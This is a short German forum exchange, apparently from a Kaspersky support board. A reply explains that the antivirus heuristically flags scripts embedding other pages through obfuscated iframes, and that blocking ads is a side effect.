Aber kann ich davon ausgehen, daß Kaspersky ihn geblockt hat? Denn auch wenn er harmlos ist, will ich ihn ja nicht auf meinem System haben!
Kaspersky hat eine heuristische Erkennung für Skripte implementiert, die auf verschleierte Weise über einen Iframe eine andere Webseite einbinden. Diese Technik wird schon mal dazu missbraucht, Schadsoftware einzubinden. Eigentlich soll damit keine Werbung blockiert werden, denn das wäre die Aufgabe von Anti-Banner. Dies ist leider ein Nebeneffekt, da ähnliche Skripte beispielsweise auch von Werbediensten eingesetzt werden, um die Arbeit von Werbeblockern zu erschweren.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.